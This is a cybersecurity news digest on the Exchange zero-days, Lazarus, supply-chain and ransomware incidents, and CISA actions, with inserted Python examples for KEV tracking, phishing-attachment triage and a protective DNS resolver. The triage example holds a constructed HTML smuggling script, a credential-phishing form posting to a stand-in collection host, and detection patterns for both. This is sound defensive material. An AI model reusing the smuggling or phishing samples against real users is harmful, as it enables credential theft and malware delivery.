At a glance.
- Microsoft warns of Exchange Server vulnerabilities.
- Hacktivists compromise Mexican government data.
- New Lazarus activity: bring-your-own-vulnerable-driver.
- Software supply chain attack reported.
- API protection report describes malicious transactions.
- Analysis of cyber risk in relation to SaaS applications.
- Data stolen from US "Defense Industrial Base organization."
- Mechanisms of fraud.
- Credential theft in the name of Zoom.
- Top CVEs exploited by China.
- COVID-19-themed social engineering.
- Criminals turn to malicious HTML file attachments.
- LAUSD says ransomware operators missed most sensitive PII.
- Major sideloading cryptojacking campaign in progress.
- Killnet hits networks of US state governments.
Microsoft warns of Exchange Server vulnerabilities.
Late last Friday Microsoft disclosed two zero-days affecting three versions of its widely used Exchange Server. One, CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability; the second, CVE-2022-41082, is a remote-code execution (RCE) vulnerability that can be triggered once an attacker has access to PowerShell. Redmond is working on a fix, but until then users may follow the mitigations Microsoft's Security Response Center shared in its "Customer Guidance for Reported Zero-day Vulnerabilities in Microsoft Exchange Server." Late Sunday Microsoft added further advice: "We strongly recommend Exchange Server customers to disable remote PowerShell access for non-admin users in your organization."
Hanoi-based security firm GTSC discovered the zero-days in the course of its monitoring and remediation activity. GTSC sees strong circumstantial evidence that the threat actor or actors behind them are Chinese: "We suspect these exploits come from Chinese attack groups, based on the webshell codepage of 936, a Microsoft character encoding for simplified Chinese."
The US Cybersecurity and Infrastructure Security Agency (CISA) added both CVE-2022-41082 and CVE-2022-41040 to its Known Exploited Vulnerabilities Catalog. In both cases CISA advises organizations to apply the mitigations Microsoft has provided. US Federal executive civilian agencies have until October 21st to take action. For more information on the Microsoft Exchange zero-days, see CyberWire Pro.
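Tracking a Known Exploited Vulnerabilities due date against your own inventory is the check the KEV entry exists to drive. The script below is an added example, not CISA tooling or code from the page: it reads records shaped like the KEV JSON feed (the `vulnerabilities` array and the `cveID`, `vendorProject`, `product`, `dueDate` and `requiredAction` field names are those of the real feed, but the entries here are constructed and carry only a subset of the real fields), matches them against a constructed asset list, and reports which assets are overdue or due soon. The only values taken from the page are the two Exchange CVE identifiers and the October 21st deadline (year assumed to be 2022); the Log4j due date and all host names are constructed.

```python
from dataclasses import dataclass
from datetime import date
from typing import Dict, List

# Constructed feed fragment shaped like CISA's KEV JSON (field names as in the feed).
# Only the Exchange CVE ids and their due date come from the advisory text; the
# Log4j due date is a constructed sample value.
KEV_FEED: Dict[str, List[dict]] = {
    "vulnerabilities": [
        {"cveID": "CVE-2022-41040", "vendorProject": "Microsoft", "product": "Exchange Server",
         "dueDate": "2022-10-21", "requiredAction": "Apply mitigations per vendor instructions"},
        {"cveID": "CVE-2022-41082", "vendorProject": "Microsoft", "product": "Exchange Server",
         "dueDate": "2022-10-21", "requiredAction": "Apply mitigations per vendor instructions"},
        {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j",
         "dueDate": "2021-12-24", "requiredAction": "Apply updates per vendor instructions"},
    ]
}

# Constructed asset inventory: hostname plus the software string an agent would report.
INVENTORY: List[dict] = [
    {"host": "mail01", "software": "Microsoft Exchange Server 2019"},
    {"host": "app02", "software": "Apache Log4j 2.14"},
    {"host": "web03", "software": "nginx 1.22"},
]


@dataclass
class Finding:
    host: str
    cve_id: str
    required_action: str
    due: date
    days_remaining: int   # negative when the deadline has already passed
    status: str           # "overdue", "due_soon" or "open"


def kev_exposure(feed: dict, inventory: List[dict], today: date,
                 soon_days: int = 14) -> List[Finding]:
    """Match KEV entries to assets by vendor and product substring and classify by deadline."""
    findings: List[Finding] = []
    for entry in feed["vulnerabilities"]:
        due = date.fromisoformat(entry["dueDate"])
        vendor = entry["vendorProject"].lower()
        product = entry["product"].lower()
        for asset in inventory:
            software = asset["software"].lower()
            if vendor not in software or product not in software:
                continue
            remaining = (due - today).days
            if remaining < 0:
                status = "overdue"
            elif remaining <= soon_days:
                status = "due_soon"
            else:
                status = "open"
            findings.append(Finding(asset["host"], entry["cveID"], entry["requiredAction"],
                                    due, remaining, status))
    # Most urgent first: overdue items have the smallest (negative) days_remaining.
    return sorted(findings, key=lambda f: f.days_remaining)


if __name__ == "__main__":
    for f in kev_exposure(KEV_FEED, INVENTORY, date(2022, 10, 10)):
        print(f"{f.status:9} {f.host:7} {f.cve_id:15} due {f.due} ({f.days_remaining:+d} days): "
              f"{f.required_action}")
```

Substring matching on vendor and product is deliberately loose so that it errs toward flagging; a production version would key on CPE or package identifiers from the asset agent rather than free-text software strings.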
Hacktivists compromise Mexican government data.
Reuters reports that the Mexican government has fallen victim to a cyberattack. The compromised data belonged to the Defense Ministry and included information about the president's health condition. Other material taken in the hack included information about criminals, transcripts of communications, and records from monitoring of the US ambassador to Mexico. It may have been a hacktivist action by the environmental group "Guacamaya" ("Macaw"). The Record reports that Guacamaya has been active against other Latin American government targets, including the "Secretaría de la Defensa Nacional in México, the Policía Nacional Civil in El Salvador, the Comando General de las Fuerzas Militares in Colombia, the Fuerza Armada in El Salvador and the Ejercito of Peru." See CyberWire Pro for more on the incident.
New Lazarus activity: bring-your-own-vulnerable-driver.
Researchers at ESET say that North Korea’s Lazarus Group used Amazon-themed spearphishing documents to target “an employee of an aerospace company in the Netherlands, and a political journalist in Belgium.” The goal of the campaign, which occurred last autumn, was data theft. The researchers note that the attackers exploited a vulnerability in Dell DBUtil drivers, which was patched in May 2021. See CyberWire Pro for more on this BYOVD campaign.
Software supply chain attack reported.
CrowdStrike warns that a suspected Chinese threat actor carried out a supply-chain attack by compromising a popular commercial chat product distributed by Vancouver-based customer service firm Comm100. It’s not yet clear how many entities downloaded the malicious installer, but Reuters says “A person familiar with the matter cited a dozen known victims, although the actual figure could be much higher.” CrowdStrike adds that the “trojanized file was identified at organizations in the industrial, healthcare, technology, manufacturing, insurance and telecommunications sectors in North America and Europe.” For more on the compromise, see CyberWire Pro.
API protection report describes malicious transactions.
Cequence Security has published a report on API security, finding that 31% of the 16.7 billion observed malicious transactions in the first half of 2022 targeted unknown or unmanaged APIs, also known as shadow APIs. The vast majority of malicious activity targeting APIs is automated, for example, “sneaker bots attempting to cop the latest Dunks or Air Jordans, to stealthy attackers attempting a slow trickle of card testing fraud on stolen credit cards, to pure brute force credential stuffing campaigns.” For more on the Cequence report, see CyberWire Pro.
Analysis of cyber risk in relation to SaaS applications.
Varonis released a report today detailing Software-as-a-Service (SaaS) applications and the cyber risks associated with them. The researchers analyzed 15 petabytes of data from 717 organizations across a number of industries. 81% of the companies analyzed had sensitive SaaS data exposed to the whole internet. The average company has 10% of its cloud data exposed to every employee, 157 sensitive records exposed to the open internet through SaaS sharing features, 33 super administrator accounts (with over half of those accounts not using multi-factor authentication), and 4,468 user accounts without multi-factor authentication. For more on SaaS security trends, see CyberWire Pro.
Data stolen from US "Defense Industrial Base organization."
The Cybersecurity and Infrastructure Security Agency (CISA) released a report Tuesday detailing alert AA22-277A. From November 2021 through January 2022, CISA uncovered activity from likely multiple advanced persistent threat (APT) groups on a Defense Industrial Base (DIB) Sector organization's enterprise network. The organization affected isn't named in the report. The APTs used Impacket, an open-source toolkit, to gain access, and then used the custom data exfiltration tool CovalentStealer to steal sensitive data. In this case, as BleepingComputer notes, CISA did not indicate who was behind the APTs. "During incident response activities, CISA uncovered that likely multiple APT groups compromised the organization's network, and some APT actors had long-term access to the environment," CISA says in the report.
The agency reports that some APTs may have gained access to the victim's Microsoft Exchange Server as early as January 2021. BleepingComputer reports that they used "the HyperBro remote access trojan (RAT), and well over a dozen ChinaChopper webshell samples," on the organization's network, as well as exploiting the ProxyLogon collection of Microsoft Exchange Server vulnerabilities CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. CISA has separately published a detailed analysis of both CovalentStealer and HyperBro, the tools that figured prominently in the exploitation. For more information on the incident, see CyberWire Pro.
Mechanisms of fraud.
MIT Technology Review and Visa have published a study of digital financial services, finding that 59% of respondents cited cybersecurity threats as the biggest obstacle to expanding their use of digital payments: “Adopting more advanced security capabilities is a priority for many, including digital tokens and other forms of enhanced authorization (32%) and improving fraud detection through biometric authorization, artificial intelligence, and other advanced technologies (43%). About 42% say their security measures are important to their customers.” For more on the report, see CyberWire Pro.
Credential theft in the name of Zoom.
Armorblox released a blog Thursday detailing a credential phishing attack impersonating Zoom. Researchers report that the attack had a socially engineered payload that bypassed Microsoft Exchange email security, and targeted over 21,000 users before Armorblox stopped the attack. Additional information may be found at CyberWire Pro.
Top CVEs exploited by China.
The US National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) have issued a joint advisory on the top vulnerabilities being targeted by Chinese state-sponsored threat actors. These include CVE-2021-44228 in Apache Log4j, CVE-2019-11510 in Pulse Connect Secure, CVE-2021-22205 affecting GitLab, CVE-2022-26134 in Atlassian Confluence Server and Data Center, and CVE-2021-26855 in Microsoft Exchange Server. For more details, and industry comment, see CyberWire Pro.
COVID-19-themed social engineering.
Proofpoint has released research detailing how threat actors took advantage of the COVID-19 pandemic. The report highlights how threat actors are creatures of opportunity, acting when a theme is relevant to their audience. In this case, threat actors could cast a wide net, as COVID-19 was relevant to the entire world. The researchers also note that the pandemic provided a plausible backdrop for any type of cybercrime. Because the pandemic changed both personal and business life, social engineering lures were found to target both. For more information, see CyberWire Pro.
Criminals turn to malicious HTML file attachments.
Researchers at Trustwave SpiderLabs have observed a rise in malicious HTML attachments in phishing emails over the past month. Most of these attachments open a phishing page that impersonates a login portal to steal users’ credentials. The researchers note that some of these files will plug the user’s email address into the login field of the phishing page, to trick the user into thinking they had previously logged in. Attackers are also using HTML smuggling to avoid being detected by email security filters. For more information, see CyberWire Pro.
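The two behaviours described above, a prefilled login form and HTML smuggling (assembling a payload in the browser from an embedded blob), both leave recognisable traces in the attachment itself. The triage routine below is an added example, not Trustwave's tooling or code from the page: it applies a small set of indicator patterns to an HTML attachment, decodes any long base64 run to check for archive or executable headers, and reports a verdict with the findings that drove it. The three sample attachments (`SMUGGLING_SAMPLE`, `PHISH_SAMPLE`, `BENIGN_SAMPLE`), the `example.invalid` hostnames and the scoring thresholds are all constructed for the demonstration.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Indicators of client-side payload assembly: decode a blob, wrap it, mint an object
# URL and force a download. Any one alone is common in legitimate pages.
SMUGGLING_PATTERNS = {
    "base64_decode": re.compile(r"\batob\s*\(", re.I),
    "blob_constructor": re.compile(r"new\s+Blob\s*\(", re.I),
    "object_url": re.compile(r"URL\.createObjectURL\s*\(", re.I),
    "forced_download": re.compile(r"\.download\s*=|\bmsSaveOrOpenBlob\b", re.I),
    "programmatic_click": re.compile(r"\.click\s*\(\s*\)", re.I),
}
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{400,}={0,2}")     # the smuggled payload itself
PASSWORD_FIELD = re.compile(r"<input[^>]+type\s*=\s*[\"']?password", re.I)
# The victim's address baked into the form (as an input value or a script literal).
EMAIL_IN_VALUE = re.compile(r"value\s*=\s*[\"']([^\"'@\s]+@[^\"'\s]+)[\"']", re.I)
EMAIL_IN_SCRIPT = re.compile(r"[\"']([A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,})[\"']")


@dataclass
class Verdict:
    suspicious: bool
    findings: List[str] = field(default_factory=list)
    prefilled_email: Optional[str] = None


def triage_html_attachment(html: str) -> Verdict:
    """Score an HTML attachment for smuggling and prefilled credential-phishing traits."""
    v = Verdict(suspicious=False)
    hits = [name for name, pat in SMUGGLING_PATTERNS.items() if pat.search(html)]
    v.findings.extend(f"smuggling:{h}" for h in hits)

    for m in BASE64_BLOB.finditer(html):
        v.findings.append("embedded_base64_blob")
        blob = m.group(0)
        blob += "=" * (-len(blob) % 4)            # restore padding the regex may have cut
        try:
            head = base64.b64decode(blob)[:4]
        except ValueError:
            continue
        if head.startswith(b"MZ"):
            v.findings.append("pe_executable")
        elif head.startswith(b"PK"):
            v.findings.append("zip_archive")

    if PASSWORD_FIELD.search(html):
        v.findings.append("password_form")
    email = EMAIL_IN_VALUE.search(html) or EMAIL_IN_SCRIPT.search(html)
    if email:
        v.prefilled_email = email.group(1)
        v.findings.append("prefilled_email")

    # Thresholds are constructed for this example: several assembly steps together,
    # a blob plus assembly steps, or a password form with the target's address filled in.
    v.suspicious = (
        len(hits) >= 3
        or ("embedded_base64_blob" in v.findings and len(hits) >= 2)
        or ("password_form" in v.findings and "prefilled_email" in v.findings)
    )
    return v


# Constructed samples. The smuggled "payload" is a zip header followed by zero bytes.
PAYLOAD_B64 = base64.b64encode(b"PK\x03\x04" + b"\x00" * 400).decode()
SMUGGLING_SAMPLE = f"""<html><body><script>
  var b = atob("{PAYLOAD_B64}");
  var bytes = new Uint8Array(b.length);
  for (var i = 0; i < b.length; i++) bytes[i] = b.charCodeAt(i);
  var blob = new Blob([bytes], {{type: "application/octet-stream"}});
  var a = document.createElement("a");
  a.href = URL.createObjectURL(blob);
  a.download = "invoice.zip";
  a.click();
</script></body></html>"""
PHISH_SAMPLE = """<html><body>
<form action="https://portal.example.invalid/collect" method="post">
  <input type="email" name="user" value="victim@example.invalid">
  <input type="password" name="pass">
  <button>Sign in</button>
</form></body></html>"""
BENIGN_SAMPLE = """<html><body><p>Your receipt is attached.</p>
<a href="https://shop.example.invalid/receipt">View receipt</a></body></html>"""

if __name__ == "__main__":
    for label, sample in [("smuggling", SMUGGLING_SAMPLE), ("phish", PHISH_SAMPLE),
                          ("benign", BENIGN_SAMPLE)]:
        print(label, triage_html_attachment(sample))
```

The patterns are deliberately narrow so the result is explainable in a mail-gateway log; the point of decoding the blob head is that a smuggled archive or PE is a far stronger signal than the JavaScript scaffolding around it, which plenty of legitimate single-page apps also use.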
LAUSD says ransomware operators missed most sensitive PII.
The Los Angeles Unified School District (LAUSD) continues its recovery from the ransomware attack it first reported on September 5th. The Wall Street Journal reports that the LAUSD says that the data taken by the criminals (said to be an unspecified gang operating from Russia) did not include student or staff psychiatric records, as had been rumored. The District says that the compromised data included "little" information on students or staff.
Major sideloading cryptojacking campaign in progress.
Bitdefender researchers say they've detected a significant cryptojacking campaign in the wild. It's a sideloading campaign, and represents an evolution in criminal cryptojacking technique. Bitdefender explains, "This is the case of an active cryptojacking campaign that uses a Dynamic Library Link (DLL) hijacking vulnerability in OneDrive to achieve persistence and run undetected on infected devices."
Killnet hits networks of US state governments.
Killnet, the Russian hacktivist group, nominally independent but acting on behalf of Moscow's security services, has knocked some US state government services offline, CNN reports. Colorado, Kentucky, and Mississippi at least were affected, with some services sporadically rendered unavailable yesterday in distributed denial-of-service (DDoS) attacks. Kentucky's Board of Elections was one of the sites disrupted. The story is still developing, but the effects of the attacks don't seem to have risen above a nuisance level. Killnet has hitherto been best known for conducting DDoS attacks against lightly defended targets in European countries Russia deems too friendly to Ukraine.
Patch news.
The US Cybersecurity and Infrastructure Security Agency (CISA) Tuesday released five Industrial Control System (ICS) Advisories. The advisories cover Johnson Controls Metasys ADX Server (improper authentication "could allow an Active Directory user to execute validated actions without providing a valid password"), Hitachi Energy Modular Switchgear Monitoring (cross-site request forgery and HTTP response splitting "could allow an attacker to perform malicious command injection, trick a valid user into downloading malicious software onto their computer;" "successful exploitation may also allow an attacker to pose as a legitimate user"), Horner Automation Cscape (out-of-bounds write and access of uninitialized pointer vulnerabilities "could allow local attackers to execute arbitrary code"), Omron CX-Programmer (an out-of-bounds write vulnerability could be exploited to crash a device or allow arbitrary code execution), and BD Totalys MultiProcessor (hard-coded credentials "could allow an attacker to access, modify, or delete sensitive information, including electronic protected health information (ePHI), protected health information (PHI), and personally identifiable information (PII)").
Crime and punishment.
Former Uber security chief Joe Sullivan has been found guilty of covering up a 2016 data breach, as well as concealing information about a felony from law enforcement, Security Week reports. The month-long trial resulted in a verdict that could put Sullivan in prison for up to 8 years: a maximum of 5 years for the obstruction charge and a maximum of 3 years for a misprision charge. The New York Times reports that the jury of six men and six women took more than 19 hours to reach a verdict. For more on the verdict, including some reaction from industry experts, see CyberWire Pro.
The Record by Recorded Future reports that a 19-year-old Australian man has been arrested after allegedly using stolen Optus records obtained from the recent hack to blackmail victims. According to Australian Federal Police (AFP), the teen sent texts to at least 93 victims demanding $2,000 be sent to a bank account, and threatened fraud in the victims' names if the actions were not completed. “At this stage it appears none of the individuals who received the text message transferred money to the account,” said the AFP.
US District Judge Robert S. Lasnik has sentenced former Amazon systems engineer Paige Thompson, the hacker behind a 2019 data breach of US financial services firm Capital One, to just time served and five years of probation. As CNET recounts, Thompson accessed cloud storage buckets owned by Capital One and exfiltrated the personal data of over 100 million individuals. Although prosecutors were seeking a seven-year sentence, Thompson could have faced up to twenty years in prison for wire fraud. Explaining his ruling, Judge Lasnik said sending Thompson to prison would have been "particularly difficult on her because of her mental health and transgender status.” The Register posits Judge Lasnik was also swayed by Thompson’s statement that she hoped to contribute to society in the future. US Attorney Nick Brown expressed his disappointment in the ruling, stating, “Ms. Thompson’s hacking and theft of information of 100 million people did more than $250 million in damage to companies and individuals. Her cybercrimes created anxiety for millions of people who are justifiably concerned about their private information. This conduct deserves a more significant sanction.” A hearing in December will determine how much Thompson will pay her victims for restitution.
Courts and torts.
The Securities and Exchange Commission (SEC) has charged Kim Kardashian with promoting an EthereumMax crypto asset security without disclosing what she was paid to do so. She failed to disclose that she received $250,000 to post on Instagram about EMAX tokens. The SEC says, "Kardashian agreed to settle the charges, pay $1.26 million in penalties, disgorgement, and interest, and cooperate with the Commission's ongoing investigation."
Policies, procurements, and agency equities.
An Executive Order signed Friday by US President Biden moves the US and the EU closer to agreement on data privacy standards. It specifies the safeguards the US undertakes to put in place pursuant to the agreement reached with the European Union in March of this year. The Executive Order specifically addresses European concerns about US signals intelligence and other intelligence activities.
CISA opened the US Federal Fiscal Year with Binding Operational Directive 23-01, "Improving Asset Visibility and Vulnerability Detection on Federal Networks." The Directive specifies desired outcomes for asset visibility and vulnerability detection without prescribing the steps Federal Executive Civilian Agencies need to take to comply. The key compliance deadline is April 3, 2023.
The US FBI and CISA have issued a public service announcement stating that cyber activity is unlikely to disrupt or prevent voting in the US: "As of the date of this report, the FBI and CISA have no reporting to suggest cyber activity has ever prevented a registered voter from casting a ballot, compromised the integrity of any ballots cast, or affected the accuracy of voter registration information. Any attempts tracked by FBI and CISA have remained localized and were blocked or successfully mitigated with minimal or no disruption to election processes." For more on CISA's and the FBI's assessment, see CyberWire Pro.
The US Cybersecurity and Infrastructure Security Agency (CISA) is launching a Protective Domain Name System (DNS) service that will help federal agencies defend against cyberattacks. DNS is used as an attack vector for a wide range of cyber incidents, and CISA’s protective DNS would serve as a barrier between agency networks and the rest of the internet, blocking queries that seek access to known malicious IP addresses. The new DNS resolver replaces an old DNS sinkholing service which was limited to agencies’ on-premise networks, while the new one covers roaming and mobile devices and cloud-based assets. Branko Bokan, lead architect for Protective DNS at CISA, explains, “A lot of federal technologies are no longer behind those on-premise networks, behind firewalls. They’re now all over the Internet, in the cloud, but also we see a large number of what we call roaming and nomadic devices and mobile devices that federal users, both employees and contractors, are using to access federal resources.” The hope is to expand the service beyond federal agencies in the future, Federal News Network adds, and the natural next step would be local governments. “When we originally designed this service, we designed it in mind of the need to scale it to serve the biggest enterprise,” Bokan states. “We would really like to be able to offer this service not just to the federal enterprise, not just the federal civilian executive branch agencies, but to other levels of U.S. governments that might be interested in the same type of protection.”
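The core of a protective resolver is policy applied in two places: the queried name is checked against a blocklist before anything is forwarded, and the upstream answer is checked against known-malicious address ranges before it is returned, with blocked lookups answered from a sinkhole and logged per client regardless of where that client sits. The model below is an added example and is not CISA's service or any part of it; the upstream answers, blocklists, client labels and the `192.0.2.1` sinkhole address (from the RFC 5737 documentation ranges) are constructed for the demonstration.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

SINKHOLE_IP = "192.0.2.1"   # constructed sinkhole answer (documentation range)


@dataclass
class Response:
    qname: str
    action: str            # "allowed", "blocked_name" or "blocked_ip"
    answers: List[str]
    reason: Optional[str] = None


class ProtectiveResolver:
    """Resolver that enforces a domain blocklist on queries and an IP blocklist on answers."""

    def __init__(self, upstream: Dict[str, List[str]], blocked_domains: Iterable[str],
                 blocked_networks: Iterable[str]) -> None:
        # 'upstream' stands in for the recursive resolver the service forwards to.
        self.upstream = {k.lower().rstrip("."): v for k, v in upstream.items()}
        self.blocked_domains = {d.lower().rstrip(".") for d in blocked_domains}
        self.blocked_networks = [ipaddress.ip_network(n) for n in blocked_networks]
        self.log: List[Tuple[str, str, str, Optional[str]]] = []

    def _name_blocked(self, qname: str) -> Optional[str]:
        # A listed domain covers itself and every label beneath it.
        labels = qname.split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            if candidate in self.blocked_domains:
                return candidate
        return None

    def _ip_blocked(self, ip: str) -> Optional[str]:
        addr = ipaddress.ip_address(ip)
        for net in self.blocked_networks:
            if addr in net:
                return str(net)
        return None

    def resolve(self, qname: str, client: str) -> Response:
        qname = qname.lower().rstrip(".")
        hit = self._name_blocked(qname)
        if hit:
            resp = Response(qname, "blocked_name", [SINKHOLE_IP], f"name under blocklisted {hit}")
        else:
            answers = self.upstream.get(qname, [])
            bad = [(a, self._ip_blocked(a)) for a in answers]
            bad = [(a, net) for a, net in bad if net]
            if bad:
                resp = Response(qname, "blocked_ip", [SINKHOLE_IP],
                                f"answer {bad[0][0]} in blocklisted {bad[0][1]}")
            else:
                resp = Response(qname, "allowed", answers)
        # The client label is whatever identifies the endpoint (on-prem, roaming, cloud);
        # policy does not depend on it, only the audit record does.
        self.log.append((client, resp.qname, resp.action, resp.reason))
        return resp


def build_demo_resolver() -> ProtectiveResolver:
    # Constructed upstream data and policy; all addresses are in documentation ranges.
    upstream = {
        "portal.example.net": ["198.51.100.10"],
        "update.evil.example": ["203.0.113.7"],
        "cdn.lookalike.example": ["203.0.113.77"],
    }
    return ProtectiveResolver(upstream, blocked_domains={"evil.example"},
                              blocked_networks=["203.0.113.0/24"])


if __name__ == "__main__":
    r = build_demo_resolver()
    for name, client in [("portal.example.net", "hq-workstation"),
                         ("UPDATE.evil.example.", "roaming-laptop"),
                         ("cdn.lookalike.example", "cloud-vm")]:
        print(r.resolve(name, client))
```

Checking the answer as well as the name is what catches a fresh, unlisted hostname that still points into infrastructure already known to be malicious; the sinkhole answer, rather than a refusal, lets the blocked connection attempt itself be observed and attributed to a client.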
David Frederick, executive director of U.S. Cyber Command, described US participation in Ukraine's cyber defense during his presentation at GovCon Wire's Cybersecurity in National Security Summit. He characterized the mission as a series of "hunt-forward" operations. US teams from the Cyber National Mission Force were dispatched to Ukraine late last year and worked with their Ukrainian counterparts to assess and secure critical IT and infrastructure networks. Frederick noted that, in the course of those operations, US Cyber Command gained valuable insight into Russian methods of cyberwar, much of which it has shared not only with Government partners like CISA and the FBI but with the private sector as well.
NBC News reports that the US Supreme Court has agreed to hear a case concerning Section 230 of the Communications Decency Act, which states that internet companies cannot be held responsible for transmitting content posted by others. The Washington Post explains that the plaintiffs are the family of Nohemi Gonzalez, a woman murdered in 2015 in a series of attacks carried out by the militant group ISIS, and they allege that YouTube is liable for recommending videos promoting extremist Islamic State views to users. "Videos that users viewed on YouTube were the central manner in which ISIS enlisted support and recruits from areas outside the portions of Syria and Iraq which it controlled," lawyers for the family argued in their petition. Lawyers at YouTube parent company Google say Section 230 shields the video-streaming platform from any liability. Passed in 1996, the law was created when the internet was young, and in the years since it has come under much scrutiny from critics on both sides of the aisle who say that platforms like YouTube, Instagram, and Facebook forfeit their protections when they employ the pervasive algorithms used to recommend videos and advertise products. The New York Times adds that the Supreme Court has also agreed to hear a second lawsuit, Twitter v. Taamneh, which asks whether the company can be liable under the Anti-Terrorism Act for the 2017 death of Jordanian citizen Nawras Alassaf during an ISIS-affiliated attack in Istanbul. Both cases stand to have a major impact on how internet companies are (or are not) held accountable for the content they distribute.